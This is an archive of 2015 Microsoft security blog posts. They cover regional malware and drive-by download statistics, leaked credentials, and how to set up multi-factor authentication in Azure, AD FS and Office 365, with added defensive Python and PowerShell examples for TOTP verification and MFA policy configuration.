A drive-by download site is a website that hosts one or more exploits that target vulnerabilities in web browsers and browser add-ons. Users with vulnerable computers can be infected with malware simply by visiting such a website, even without attempting to download anything. Drive-by download pages are usually hosted on legitimate websites to which an attacker has posted exploit code. Attackers gain access to legitimate sites through intrusion or by posting malicious code to a poorly secured web form, like a comment field on a blog. Compromised sites can be hosted anywhere in the world and concern nearly any subject imaginable, making it difficult for even an experienced user to identify a compromised site from a list of search results.

Figure 4: Drive-by download pages indexed by Bing at the end of the fourth quarter of 2014 (4Q14), per 1,000 URLs in each country/region

Only Syria stands out with substantially higher concentrations of drive-by download sites in the region during 3Q13, 4Q13, and 4Q14.

Figure 5: Concentration of drive-by download URLs tracked by Bing in select locations in the Middle East on a reference date at the end of the associated quarter, expressed as the number of drive-by download URLs per every 1,000 URLs hosted in the country/region.

I asked Cyril Voisin, Microsoft’s Chief Security Advisor in the Middle East and Africa, who is based in the UAE, how people in the region should protect themselves. The following is what Cyril recommended.

Arabian Peninsula and Northern Africa countries were particularly affected by MSIL/Bladabindi and Win32/Jenxcus, as these were part of attacks targeting Arabic-speaking people, making them less suspicious as their language was used in order to lure them. For our larger MEA region, as well as for any other location in the world, I think the number 1 protection is the vigilance of users.

At the end of the day this boils down to:

  • Stay aware of risks and use your judgement as your best defense. And please spread the word by talking to your family and community members to increase their online safety. Anytime you are about to take any potentially harmful decision, reflect before you act and look for clues indicating phishing. Would this person really write to me in a foreign language to warn me about a picture where I look funny? Would this website confirm an order I did not make without calling me by my name? Would my bank require new urgent security information without notice? And of course everyone proposing to share their fortune with you only wants to get your money to build their own fortune… Finally, beware of tech support phone scams where someone will call you directly and try to manipulate you over the phone, pretending for instance to be working for Microsoft support and asking you to install software on your machine, in order to take control of it.
  • Enforce basic hygiene. Again, this is not new, and at the risk of sounding like a broken record, I would like to remind everyone about the basics. If you want to skip that section, one recommendation though: upgrade to Windows 10 to benefit from all the security work that has been done to enhance your protection and automate some of the tasks below and beyond.
    • Keep everything up to date (all software on your PC, your tablet, your smartphone): that means applying updates for your system and applications, including browser, plug-ins, music software… as newer software is better for security.
    • Run an up-to-date antimalware solution and keep in mind that the presence of this security tool does not mean you can take inconsiderate risks.
    • Use a firewall.
    • Choose good passwords where they are necessary. Hint: Windows Hello and Microsoft Passport are your friends.

I hope you found this analysis informative and useful. You can find the latest data on the locations I examined in this series and many others at http://microsoft.com/sir.

Tim Rains
Chief Security Advisor
Worldwide Cybersecurity & Data Protection

Cloud security controls series: Multi-factor Authentication

July 20th, 2015 No comments

Recently I wrote an article on the risk of leaked credentials in which I discussed how credentials are stolen in bulk directly from organizations’ websites. As illustrated in Figure 1, during the eight months between November 2013 and June 2014, Microsoft tracked about 1,700 distinct website credential thefts, comprising a little more than 2.3 million credentials that were posted in public places on the Internet. This number represents only a small fraction of the credentials that are traded in forums and specialized websites on less publicly accessible spaces on the Internet that cater to the illicit trade in stolen credentials. This problem is amplified in cases where victims have used the same credentials for access to multiple different service accounts on the Internet. Additionally, many of the high-profile network compromises you have heard about over the past several years had a phishing component in the attack. In many cases someone with a valid user name and password was tricked into disclosing those credentials in a phishing attack that subsequently provided attackers with a way into the infrastructure. Figure 2 illustrates that SmartScreen Filter reported 10.2 phishing attempts per 1,000 unique IP addresses in June 2014. Computers in Western Europe were disproportionately affected by phishing attempts. Four of the 10 locations reporting more than 20 phishing impressions per 1,000 unique IP addresses in June 2014 were in Western Europe: Italy (35.0), France (27.3), Belgium (26.1), and Spain (23.4). Other locations reporting high rates of phishing impressions include Venezuela (24.9) and South Africa (22.0).

Figure 1 (left): Number of stolen credentials from publicly-posted credential thefts, per month, from November 2013 to June 2014, data from the Microsoft Security Intelligence Report volume 17; Figure 2 (right): Computers reporting phishing impressions per 1,000 unique client IP addresses in June 2014, data from the Microsoft Security Intelligence Report volume 17

In a world where hundreds of millions of leaked credentials are bought and sold regularly, and phishing attacks are so common and effective, many of the CISOs I talk to have come to the conclusion that passwords, even complex passwords and passphrases, by themselves are no longer sufficient to protect many of the resources that they are entrusted with. After all, even if all the passwords and passphrases meet all of their organization’s password complexity requirements, if attackers have a massive list of leaked credentials in which they can find valid ones, the complexity of those credentials isn’t really a mitigating factor for that type of risk. Most of the CISOs I have talked to have implemented or plan to implement some form of multi-factor authentication as a control that helps mitigate some of these attacks. Multi-factor authentication adds one or more factors to the authentication process so that in addition to something the user knows (a password or PIN), successful authentication also relies on something the user has (like a token generator, a smartcard, a specific device or application) or something the user is (biometrics like facial recognition or iris or fingerprint scans). These additional factors make it harder for attackers to use leaked or stolen credentials to gain illegal access to systems. Security professionals use multi-factor authentication to help manage authentication in many on-premise scenarios, including logging into Windows and authenticating to Active Directory, VPN, Direct Access, Exchange, Terminal Services, web applications, etc. In some cases multi-factor authentication helps organizations meet their compliance requirements.

When I have conversations about Microsoft’s Cloud services with customers, one of the first security controls I get asked about is multi-factor authentication. Naturally, security professionals that have implemented multi-factor authentication in their on-premise environments want to know they have the option to also use it to help protect users, data, and applications in the Cloud. Multi-factor authentication is available for Microsoft Cloud services, and there are several configuration options to choose from depending on the service and assets you are trying to protect. Some of these options include Multi-factor Authentication for Azure Administrators, Azure Multi-factor Authentication, Azure Multi-factor Authentication Server, and Multi-factor Authentication for Office 365.

Azure Multi-factor Authentication is the multi-factor authentication service for Azure Active Directory. It helps to protect whatever assets you have protected with Azure Active Directory authentication including Cloud applications like Microsoft Office 365, OneDrive for Business, and Windows Intune. It can also be used to protect applications you develop on-premise as well as the thousands of SaaS applications available through Azure’s Application Gallery (screen shot in Figure 3), thus providing a more secure, single sign-on experience for people in your organization.

Figure 3: A screen shot of the Azure Application Gallery in the Azure portal, currently with 2,494 popular SaaS applications available

When enabled, Azure Multi-factor Authentication can be configured to require users to use a mobile app, phone call, or text message after entering a valid password when authenticating to Cloud-based or on-premise applications. You can enforce multi-factor authentication on individual users or on specific applications. For example, let’s say your organization had a corporate LinkedIn account. You can provide access to that application to specific users in your organization via Azure Active Directory so they can access it via the app access panel at http://myapps.microsoft.com/. You could enforce multi-factor authentication for specific users so they have to use multiple factors when they log on to the app access panel or when they launch LinkedIn in the app access portal. Figure 4 illustrates how this is configured: in the configuration settings for that application, I had the option to require multi-factor authentication for the users of that application or any of the other applications I have added in my Azure Active Directory.

Figure 4: How the Azure administrator adds the LinkedIn app to Azure Active Directory Applications in the Azure Portal and configures multi-factor authentication, so that users can access the application from the Azure app access panel

Figure 5: A user logs into the Azure app access panel and sees they have been given access to the LinkedIn application; when the user launches LinkedIn from the Azure app access panel for the first time after multi-factor authentication has been enabled on the application, the user is prompted to set up the second factor for use in authentication after they successfully authenticate with their user name and password; the user can select the method they want to use for a second factor; the user selected “Mobile app” in this example and has some configuration options available; instructions are then presented to help the user install the mobile app on their smartphone – essentially installing the multi-factor authentication app from the appropriate app store and scanning the barcode
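The “Mobile app” factor described above, worked through end to end as an added example (not Microsoft’s code and not how Azure Multi-factor Authentication is implemented internally): enrolment produces the text a provisioning barcode carries, the verifier checks a time-based code within a small clock-skew window, and a password that has leaked or been phished fails on its own. It assumes the app is a standard RFC 6238 TOTP token; the issuer name, account name and password are constructed sample values.

```python
"""Password + TOTP "mobile app" second factor (RFC 4226 / RFC 6238).

Added example, not Microsoft's code. It assumes the mobile-app factor is a
standard TOTP token whose provisioning barcode encodes an otpauth:// URI
(an assumption; Azure's own app flow may differ in detail).
"""
import base64
import hashlib
import hmac
import secrets
import struct
from typing import Optional, Tuple
from urllib.parse import quote

STEP_SECONDS = 30   # RFC 6238 default time step
DIGITS = 6          # code length displayed by the app
SKEW_STEPS = 1      # accept one step of clock drift either side


def hotp(secret: bytes, counter: int) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** DIGITS).zfill(DIGITS)


def totp(secret: bytes, at: float) -> str:
    """RFC 6238 TOTP: HOTP with the Unix time step as the counter."""
    return hotp(secret, int(at) // STEP_SECONDS)


def enrolment_uri(secret: bytes, account: str, issuer: str) -> str:
    """The text the provisioning barcode carries; the app scans it once at set-up."""
    b32 = base64.b32encode(secret).decode().rstrip("=")
    return (f"otpauth://totp/{quote(issuer)}:{quote(account)}"
            f"?secret={b32}&issuer={quote(issuer)}&digits={DIGITS}&period={STEP_SECONDS}")


def verify_second_factor(secret: bytes, code: str, at: float,
                         last_step: Optional[int] = None) -> Tuple[bool, Optional[int]]:
    """Check a submitted code against the current step and its skew neighbours.

    Returns (accepted, step_consumed). Steps at or before last_step are refused,
    so a code captured in transit cannot be replayed; comparison is constant-time.
    """
    step = int(at) // STEP_SECONDS
    for candidate in range(step - SKEW_STEPS, step + SKEW_STEPS + 1):
        if last_step is not None and candidate <= last_step:
            continue
        if hmac.compare_digest(hotp(secret, candidate), code):
            return True, candidate
    return False, last_step


def enrol_user(users: dict, username: str, password: str, issuer: str = "ExampleCorp") -> str:
    """Store a salted password hash plus a fresh TOTP secret; return the barcode text."""
    salt = secrets.token_bytes(16)
    users[username] = {
        "salt": salt,
        "pw_hash": hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000),
        "secret": secrets.token_bytes(20),   # the "something you have" lives on the phone
        "last_step": None,
    }
    return enrolment_uri(users[username]["secret"], username, issuer)


def authenticate(users: dict, username: str, password: str, code: str, at: float) -> bool:
    """Something you know (password) AND something you have (the app's code).

    A password harvested by phishing or found in a leaked credential dump fails
    here unless the caller also holds the enrolled device's secret.
    """
    rec = users.get(username)
    if rec is None:
        return False
    pw_ok = hmac.compare_digest(
        hashlib.pbkdf2_hmac("sha256", password.encode(), rec["salt"], 100_000), rec["pw_hash"])
    code_ok, used = verify_second_factor(rec["secret"], code, at, rec["last_step"])
    if pw_ok and code_ok:
        rec["last_step"] = used   # consume the step only on full success
        return True
    return False


if __name__ == "__main__":
    directory: dict = {}
    print(enrol_user(directory, "alice@example.com", "correct horse"))   # constructed sample user
    now = 1234567890
    good = totp(directory["alice@example.com"]["secret"], now)
    print(authenticate(directory, "alice@example.com", "correct horse", good, now))   # True
    print(authenticate(directory, "alice@example.com", "correct horse", good, now))   # False: replay
```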

You can enable the multi-factor authentication service for on-premises applications by using Azure Multi-factor Authentication Server that can be downloaded from the Azure Portal, as seen in Figure 7. Multi-Factor Authentication for Azure Administrators allows every administrative account of an Azure subscription to be protected by multi-factor authentication. So even if your organization decides not to implement multi-factor authentication for all users, the organization’s Azure administrators have the option to enable it for their accounts.

Figure 6: Advanced configuration for Azure Multi-factor Authentication

Figure 7: The Server download option for Azure Multi-factor Authentication Server

One tip about multi-factor authentication providers in Azure, as illustrated in Figure 8: you only need to configure a multi-factor authentication provider if you aren’t already getting Azure Multi-factor Authentication as part of a service you use. If you are using Azure Active Directory Premium, Office 365, or Multi-Factor Authentication for Azure Administrators, then Azure Multi-factor Authentication is included in those offerings at no additional cost. If you plan to use Azure Multi-factor Authentication as a stand-alone service, then you’ll have to create a multi-factor authentication provider, which is how the stand-alone service is billed. If you create a provider when you don’t need one, you’ll likely be charged for Azure Multi-factor Authentication you are already entitled to, so confirm that you need a provider before you create one.

Figure 8: Multi-factor Authentication Providers found in the Azure portal under the Active Directory in the left navigation bar, then click the “MULTI-FACTOR AUTH PROVIDERS” tab

There are a lot of great resources that the Microsoft Azure Active Directory team have published on this topic:
Azure Multi-Factor Authentication
Getting started with Windows Azure Multi-Factor Authentication
Azure Multi-Factor Authentication Story
Securing access to cloud services – Information for Administrators
Adding Multi-Factor Authentication to Azure Active Directory
Configuring Azure Multi-Factor Authentication
Azure Multi-Factor Authentication FAQ
Enabling Multi-Factor Authentication for On-Premises Applications and Windows Server
Building Multi-Factor Authentication into Custom Apps (SDK)
Multi-Factor Authentication for Azure AD (video)

As I mentioned earlier, many of the enterprise customers I talk to have already invested in on-premise identity management solutions to meet specific security or compliance objectives. They use technologies such as Active Directory Federation Services (AD FS), certificate-based authentication, physical smart cards, or virtual smart cards. Both Microsoft and third-party multi-factor authentication methods are available in Windows Server 2012 R2 AD FS. Once an authentication provider is installed and registered with AD FS on Windows Server 2012 R2, you can enforce multi-factor authentication as part of the global authentication policy or per relying party. A number of providers offer multi-factor authentication adapters for AD FS in Windows Server 2012 R2; currently these include Gemalto, inWebo Technologies, Login People, RSA, SafeNet, Swisscom and Symantec. Microsoft Azure Multi-factor Authentication will also work in this scenario. More background information, along with the steps to do this, is available here: Manage Risk with Additional Multi-Factor Authentication for Sensitive Applications.
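As an added illustration (my code, not code from the original post or from the AD FS documentation), the following PowerShell carries out the AD FS side of what Figures 10 and 11 below show: it checks that the Azure Multi-factor Authentication Server adapter is registered, adds it to the global authentication policy as an additional provider without dropping any provider already enabled, and then requires it for one relying party only when the request comes from outside the corporate network. The provider name, the relying party display name, and running elevated on the primary AD FS server are my assumptions; the post does not state them.

```powershell
# Added example, not from the original post: enable the Azure MFA Server AD FS
# adapter in the AD FS 2012 R2 global authentication policy and require it for
# one relying party on extranet requests.
# Assumptions: run elevated on the primary AD FS server after the adapter has
# been installed and activated; the provider name and relying-party name below
# are placeholders for this example.

Import-Module ADFS

$providerName = 'WindowsAzureMultiFactorAuthentication'   # assumed adapter name

# 1. Refuse to reference a provider that is not registered; a typo here would
#    otherwise leave the policy pointing at nothing.
$registered = Get-AdfsAuthenticationProvider | Where-Object { $_.Name -eq $providerName }
if (-not $registered) {
    throw "Authentication provider '$providerName' is not registered with AD FS. Install the AD FS adapter first."
}

# 2. Add the adapter as an additional (second-factor) provider, keeping any
#    third-party adapter that is already enabled.
$policy = Get-AdfsGlobalAuthenticationPolicy
$additional = @($policy.AdditionalAuthenticationProvider | Where-Object { $_ }) + $providerName | Select-Object -Unique
Set-AdfsGlobalAuthenticationPolicy -AdditionalAuthenticationProvider $additional

# 3. Require MFA for a sensitive relying party when the request is not from the
#    corporate network. AD FS issues the insidecorporatenetwork claim itself;
#    "false" means the request arrived through the proxy (extranet).
$rpName = 'Claims Aware Sensitive App'   # assumed relying-party display name
$mfaRule = @'
c:[Type == "http://schemas.microsoft.com/ws/2012/01/insidecorporatenetwork", Value == "false"]
 => issue(Type = "http://schemas.microsoft.com/ws/2008/06/identity/claims/authenticationmethod",
          Value = "http://schemas.microsoft.com/claims/multipleauthn");
'@
Set-AdfsRelyingPartyTrust -TargetName $rpName -AdditionalAuthenticationRules $mfaRule

# 4. Verify: the global policy lists the provider and the relying party carries the rule.
Get-AdfsGlobalAuthenticationPolicy | Select-Object -ExpandProperty AdditionalAuthenticationProvider
(Get-AdfsRelyingPartyTrust -Name $rpName).AdditionalAuthenticationRules
```

Set-AdfsAdditionalAuthenticationRule applies the same kind of rule globally instead of per relying party. Note that the insidecorporatenetwork claim is only as trustworthy as the Web Application Proxy deployment that determines it, so for administrator accounts and the most sensitive applications it is safer to drop the Value == "false" condition and require the second factor on every request.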

Figure 9: An illustration of how Azure Multi-factor Authentication Server can be integrated to manage authentication requests from on-premise applications

Figure 10 (left): Installing the AD FS Adapter in the Azure Multi-factor Authentication Server after it has been installed and activated; Figure 11 (right): Configuring the AD FS Global Authentication Policy to use Azure Multi-factor Authentication

There are a bunch of other resources available related to using AD FS multi-factor authentication:

Microsoft Azure Multi-Factor Authentication Deep Dive: Securing Access on Premises and in the Cloud (video)
Active Directory Federation Services Overview
Getting started with Azure Multi-Factor Authentication and Active Directory Federation Services
Securing cloud resources with Azure Multi-Factor Authentication and AD FS
Secure cloud and on-premises resources using Azure Multi-Factor Authentication Server with Windows Server 2012 R2 AD FS
Secure cloud and on-premises resources using Azure Multi-Factor Authentication Server with AD FS 2.0
Building Multi-Factor Authentication into Your Applications Using the SDK
Windows Azure: Authenticate Windows Azure with ADFS
Windows Azure Multi-Factor Authentication Server (video)
Taking advantage of Identity capabilities in the Azure Pack (video)

For Office 365, multi-factor authentication can be used to protect both Office 365 administrative accounts and Office 365 user accounts. Multi-factor Authentication for Office 365 is powered by Azure Multi-factor Authentication, and works exclusively with Office 365 applications and is managed from the Office 365 portal. It’s available for all the different SKUs of Office 365. Once enabled, users are required to acknowledge a phone call, text message, or an app notification on their smartphone after correctly entering their password. Only after this second authentication factor has been satisfied does the user get access to Office 365 resources. The Office 365 team has published some great articles and videos that you can use to learn more about Multi-factor Authentication for Office 365:

Multi-Factor Authentication for Office 365
Webcast: Office 365 sign-in with Multi-Factor Authentication
Set up multi-factor authentication for Office 365
Security in Office 365 White Paper
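As an added example (my code, not the Office 365 team’s), the PowerShell below uses the MSOnline module to find Global Administrators who have no multi-factor authentication requirement and to enable per-user multi-factor authentication for them, which is the administrator-protection scenario described above. It assumes the MSOnline module is installed, that Connect-MsolService has already been run with a Global Administrator account, and that the role to check is the built-in ‘Company Administrator’ role (the directory name for Global Administrator).

```powershell
# Added example, not from the original post: report Office 365 / Azure AD global
# administrators without an MFA requirement and enable per-user MFA for them.
# Assumptions: MSOnline module installed; Connect-MsolService already run as a
# Global Administrator; 'Company Administrator' is the directory role name.

Import-Module MSOnline

function Get-AdminsWithoutMfa {
    # Global administrators whose StrongAuthenticationRequirements collection is empty.
    $role = Get-MsolRole -RoleName 'Company Administrator'
    Get-MsolRoleMember -RoleObjectId $role.ObjectId |
        Where-Object { $_.RoleMemberType -eq 'User' } |
        ForEach-Object { Get-MsolUser -UserPrincipalName $_.EmailAddress } |
        Where-Object { -not $_.StrongAuthenticationRequirements -or
                       $_.StrongAuthenticationRequirements.Count -eq 0 }
}

function Enable-MfaForUser {
    param([Parameter(Mandatory)][string]$UserPrincipalName)
    # RelyingParty "*" applies the requirement to every application.
    # State "Enabled" prompts the user to register a second factor at next sign-in;
    # "Enforced" assumes registration is done and makes clients that cannot perform
    # MFA (older Office clients) require app passwords instead of the plain password.
    $req = New-Object -TypeName Microsoft.Online.Administration.StrongAuthenticationRequirement
    $req.RelyingParty = '*'
    $req.State = 'Enabled'
    Set-MsolUser -UserPrincipalName $UserPrincipalName -StrongAuthenticationRequirements @($req)
}

$unprotected = @(Get-AdminsWithoutMfa)
foreach ($admin in $unprotected) {
    Write-Host "Enabling MFA for $($admin.UserPrincipalName)"
    Enable-MfaForUser -UserPrincipalName $admin.UserPrincipalName
}

# Re-check: any administrator still listed here needs manual follow-up.
Get-AdminsWithoutMfa | Select-Object UserPrincipalName
```

Run the report again after each change window: a new administrator added without MFA is exactly the account an attacker holding a leaked password would go after.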

As you can see, you have several options that make it easy to enable multi-factor authentication to help protect administrator and user credentials used to access on-premise applications, Office 365 applications, Azure-based applications, and thousands of third party Cloud SaaS applications.

Tim Rains
Chief Security Advisor
Worldwide Cybersecurity & Data Protection

The Latest Picture of the Threat Landscape in the European Union – part 2

June 29th, 2015 No comments

In part 1 of this series on the threat landscape in the European Union (EU) I examined the encounter and infection rates among EU member countries/regions, focusing on a couple of the locations with the highest malware encounter rates (ER) and infection rates (CCM).

In part 2 of the series I’ll focus on the locations in the EU with the lowest ERs and CCMs. I’ll also examine the top threats found in the region in the last half of 2014.

Figure 1 illustrates the locations in the EU that have the lowest ERs. Finland, Denmark, Sweden, Ireland, Germany, and Austria had the lowest ERs in the EU in the last quarter of 2014. These locations have consistently had lower ERs than the worldwide average.

Figure 1: Locations with the lowest encounter rates in the EU in the third (3Q14) and fourth (4Q14) quarters of 2014

Taking a closer look at Finland in Figure 2, the location with the lowest ER in the EU, we can see every category of threat is encountered significantly less frequently by systems in Finland than the worldwide average.

Figure 2: (left) malware categories encountered in Finland in the fourth quarter of 2014 compared to the worldwide averages; (right) unwanted software categories encountered in Finland and worldwide during the last quarter of 2014

Although Norway is not a member of the EU, my coworkers and many of the customers I have met in Norway would want me to mention that Norway is another location in the region with one of the healthiest ecosystems in the world, as is Japan.

Figure 3: (left) Encounter and infection rates for Norway during each quarter of 2014; (right) Encounter and infection rates for Japan during each quarter of 2014

Looking at the locations in the EU with the lowest malware infection rates we can see some of the locations with the lowest ERs in the region also have low infection rates, including Finland, Denmark, Sweden, Ireland, and Austria. Estonia had a consistently low infection rate through all four quarters of 2014. We didn’t have enough data to publish an ER for Luxembourg, but its infection rate was consistent with other low infection rate locations in the region during 2014. The Netherlands also has consistently low infection rates.

Figure 4: Locations in the EU with the lowest malware infection rates (CCM) in the last quarter of 2014

Although there are locations in the EU with consistently low infection rates, this doesn’t mean those locations don’t experience temporary dramatic infection rate increases. For example, Figure 5 illustrates some dramatic infection rate increases that took place in Austria and the Netherlands in 2011 when the Win32/EyeStye Trojan (also known as SpyEye) was detected and cleaned from a relatively large number of systems in Austria, the Netherlands, Germany and Italy. I visited numerous enterprise customers in the region during that time period to discuss this threat with them.

Figure 5: (left) The infection rate trend for Austria between the third quarter of 2011 and the second quarter of 2013; (right) the infection rate trend for the Netherlands between the third quarter of 2011 and the fourth quarter of 2012

Some locations in the EU saw great infection rate improvements in 2014. Figure 6 illustrates some of the biggest infection rate improvements in the region. France, Italy, Portugal, and Spain all ended 2014 with infection rates lower than the worldwide average after starting the year with significantly higher CCMs. Interestingly, over the years I have noticed elevated levels of Adware among these locations relative to the worldwide average, and the fourth quarter of 2014 was no different. With the exception of Portugal, these locations also all had elevated levels of Trojan Downloaders & Droppers during the last quarter of the year.

Figure 6: The largest CCM improvements in the EU in the second half of 2014

The most prevalent threat families found in the EU during the second half of 2014 are listed in Figure 7. Having only one commercial exploit kit (JS/Axpergle, also known as Angler) in the top ten threats in the region is good news, as exploit kits are typically used by attackers to spread ransomware and other malware to unpatched systems. The top three threats in the EU in the fourth quarter of 2014 were all families of worms that typically spread via unsecured file shares and removable media like USB drives.

Figure 7: The top 10 threat families in the EU in the second half of 2014

The good news is that many of these threats can be mitigated by keeping systems up-to-date with security updates and running up-to-date antimalware software. Could it be that locations in the EU that have relatively high malware infection rates also have relatively low antimalware software adoption/usage?

In part 3 of this series on the threat landscape in the EU I’m going to look at which locations in the EU have the highest and lowest usage of real-time antimalware software in the region – a key protection technology. I’m also going to examine which locations in the region host the most drive-by download attacks – a favorite malware distribution method for attackers.

Tim Rains
Chief Security Advisor
Worldwide Cybersecurity & Data Protection

The Latest Picture of the Threat Landscape in the European Union – part 1

June 25th, 2015 No comments

I had the opportunity to visit with some European based customers when I spoke at the RSA Unplugged conference in London just a few weeks ago. Many of the customers I met with were very interested in a deep dive into the types of threats we see in the region. I have written about the threat landscape in Europe and European Union (EU) extensively over the years, including the articles below:

Ransomware is on the Rise, Especially in Europe
The Threat Landscape in the European Union at RSA Conference Europe 2013
European Union check-up: Locations with Lowest Infection Rates in the EU and What We Can Learn From Them
European Union Check-Up: Malicious Websites Hosted in the EU
European Union check-up: Romania still tops the list of most infected in the EU
Cyber-Threats in the European Union: First Half 2012
Cyber-Threats in the European Union
The Threat Landscape Shifts Significantly in the European Union – Part 1
The Threat Landscape Shifts Significantly in the European Union – Part 2
The Threat Landscape Shifts Significantly in the European Union – Part 3

I thought it was time to provide an updated view of the threat landscape in the region based on the latest data just released in the newest volume of the Microsoft Security Intelligence Report published just a few weeks ago.

Figure 1: Encounter rates in the region in the fourth quarter (4Q14) of 2014

First, let’s look at the encounter rate (ER) among locations in Europe where we have sufficient data. ER is the percentage of computers running Microsoft real-time security software that report detecting malware or unwanted software during a given period of time. The worldwide average ER in the fourth quarter of 2014 was 15.9%. The average ER for the countries/regions that we have statistically significant data on in the EU was 20.8% during the same period.

As Figure 2 illustrates, in the third quarter of 2014 Bulgaria, Italy, Romania, and France had the highest ERs in the region. In the fourth quarter Bulgaria, Romania, Croatia and Latvia had the highest ERs in the EU. Bulgaria topped the list in both quarters as the location in the EU that encounters threats most often, with an ER of 26% in the third quarter and 23% in the final quarter of 2014.

Figure 2: Encounter rates in the region in the third (3Q14) and fourth (4Q14) quarters of 2014

Taking a closer look at what types of threats are being encountered most often in Bulgaria reveals higher than average levels of Trojans, Obfuscators & Injectors, Exploits, Backdoors and Browser Modifiers – as seen in Figure 3. Figure 4 shows the top threat families encountered in Bulgaria in the fourth quarter of 2014.

Figure 3: (left) malware categories encountered in Bulgaria in the last quarter of 2014 compared to the worldwide averages; (right) unwanted software categories encountered in Bulgaria and worldwide during the last quarter of 2014

Figure 4: Top threat families encountered in the last quarter of 2014 in Bulgaria
Some of the locations with relatively high ERs, like Romania and Bulgaria, are also among the locations with the highest malware infection rates (CCM[1]) in the EU as Figure 5 illustrates; these are systems that encountered malware and were successfully infected. The worldwide average infection rate in the fourth quarter of 2014 was 5.9 systems infected with malware for every 1,000 scanned by the Malicious Software Removal Tool (MSRT) or 0.59% of the 600 – 700 million systems the MSRT executes on each month. The average infection rate for the 28 countries/regions in the EU during the same period was a CCM of 5.65 or 0.57%.

Figure 5: Locations in the EU with the highest malware infection rates (CCM) in the fourth quarter of 2014

Taking a closer look at Romania during this time period reveals some interesting insights. The infection rate there has consistently been significantly higher than the worldwide average and the vast majority of the 28 locations in the EU.

Figure 6: Encounter and infection rates for Romania during each quarter of 2014

The top threat found infecting systems in Romania in the last quarter of 2014 was Win32/Sality. What makes this interesting is that Sality is a virus (an old fashioned file infector) – I have written about why this seems remarkable before: Are Viruses Making a Comeback?

Figure 7: Threat families that infected systems in Romania most often in the last quarter of 2014

Another noteworthy data point is that the percentage of systems in Romania consistently running up-to-date antimalware software (67.4%) is lower than the worldwide average (74.3%). Additionally, the percentage of systems in Romania consistently not running real-time antivirus software (26%) is higher than the worldwide average (19.1%).

Figure 8: Security software use in Romania in the last quarter of 2014

In the second part of this series on the threat landscape in the EU, I’ll examine the locations that have low encounter rates and low malware infection rates. Is there something we can learn from these countries/regions?

 

Tim Rains
Chief Security Advisor
Worldwide Cybersecurity & Data Protection

[1] Short for computers cleaned per mille (thousand). The number of computers cleaned for every 1,000 unique computers that run the MSRT. For example, if MSRT has 50,000 executions in a particular location in the first quarter of the year and removes infections from 200 computers, the CCM for that location in the first quarter of the year is 4.0 (200 ÷ 50,000 × 1,000).

The Risk of Leaked Credentials and How Microsoft’s Cloud Helps Protect Your Organization

June 18th, 2015 No comments

This week the Microsoft Identity and Security Services Division announced another new security report feature is now in preview that helps protect Azure Active Directory Premium customers from the risk associated with leaked credentials.

The Risk of Leaked Account Credentials
One scenario that has unfortunately become all too common is where account credentials are stolen in bulk by criminals through website breaches. Credentials are also unwittingly provided directly by the victims themselves through phishing attacks, or harvested from systems that are infected with malware. As we reported in the Microsoft Security Intelligence Report volume 17, account credentials that are stolen in bulk directly from organizations’ websites contribute a significant amount to the trade in stolen credentials. As part of its customer account protection operations during the period from November 2013 to June 2014, Microsoft tracked about 1,700 distinct website credential thefts, comprising a little more than 2.3 million credentials that were posted in public places on the Internet. This number represents only a small fraction of the credentials that are traded in forums and specialized websites on less publicly accessible spaces on the Internet that cater to the illicit trade in stolen credentials.

Figure 1: Number of publicly posted website credential thefts, per month, from November 2013 to June 2014


Figure 2: Number of stolen credentials from publicly-posted credential thefts, per month, from November 2013 to June 2014. The spike in February includes the public posting of 1 million hashed credentials that had been stolen from Forbes[1]


In addition to attacks on websites, a substantial number of the illicit account credentials trade is provided by devices infected with malware.

Figure 3: Trends for the most commonly encountered password stealers in the 1st half of 2014


Security Mitigations in Microsoft’s Cloud Services that can Help
Last November I wrote about a unique capability built into Azure Active Directory Premium that allows customers to identify devices that have been compromised with some of the worst professionally managed threats on the Internet, and are attempting to sign into Azure based applications. This information allows customers to identify and remediate infected systems in their environments quickly.

Figure 4: An example report illustrating “sign ins from possibly infected devices” available to Microsoft Azure Active Directory Premium customers


The new security report feature announced this week by the Microsoft Identity and Security Services Division, now in preview, complements that capability: it helps protect Azure Active Directory Premium customers from the risk associated with leaked credentials.

Figure 5: The new “Users with leaked credentials” report in the Azure management portal surfaces any matches between the leaked credentials lists that Microsoft discovers posted publicly and your tenant


You can get more details here: Azure Active Directory Premium reporting now detects leaked credentials.

Another security mitigation that can help to mitigate the risk of leaked credentials is multi-factor authentication. Typically, a user presents something they know, like their secret password, as proof of authenticity. The basic idea behind multi-factor authentication is for the user to present one or more additional proofs based on something they have, like a device for example, or something they are, such as a fingerprint or retinal scan.

Microsoft Azure and Office 365 already have multi-factor authentication support to help you manage this risk. You can get more details here: Azure Multi-Factor Authentication.

Many of the customers I talk to that manage on-premise environments have implemented some form of multi-factor authentication that helps protect their user accounts. But only a few customers I have talked to look for lists of leaked credentials and test them against their on-premise directory services. I suspect that the new “users with leaked credentials” report will be of high interest to many customers in a world where credential leakage and theft have become so commonplace.

Tim Rains
Chief Security Advisor
Worldwide Cybersecurity & Data Protection

[1] A. Greenberg, “How The Syrian Electronic Army Hacked Us: A Detailed Timeline,” Forbes.com, 20.Feb.2014. [Online]. http://www.forbes.com/sites/andygreenberg/2014/02/20/how-the-syrian-electronic-army-hacked-us-a-detailed-timeline/. [Accessed: 17-Jul-2014].

Latest data shows newer versions of Windows have lower malware infection rates than older versions

May 19th, 2015 No comments

We released the latest volume of the Microsoft Security Intelligence Report last week. The latest data on how different versions of the Windows operating system are mitigating modern malware attacks suggests that newer versions are performing better than older versions.

The figure below illustrates the malware infection rates for Windows client and server operating systems in the third and fourth quarters of 2014 based on data from hundreds of millions of systems worldwide. This data is normalized, meaning the infection rate for each version of Windows is calculated by comparing an equal number of computers per version; for example, comparing 1,000 Windows Vista Service Pack 2 (SP2) based systems to 1,000 Windows 8.1 based systems in the fourth quarter of 2014 we can see 5.2 Windows Vista based systems infected with malware compared to 1.3 Windows 8.1 systems infected. In percentage terms, that’s equivalent to 0.52% of Windows Vista based systems (5.2/1,000*100 = 0.52) compared to 0.13% of Windows 8.1 based systems (1.3/1,000*100) infected with malware.

Figure: Infection rate by client and server operating system in the third and fourth quarters of 2014 (3Q14/4Q14)

The newest versions of both Windows client and server operating systems had the lowest malware infection rates during the period, by a large margin.

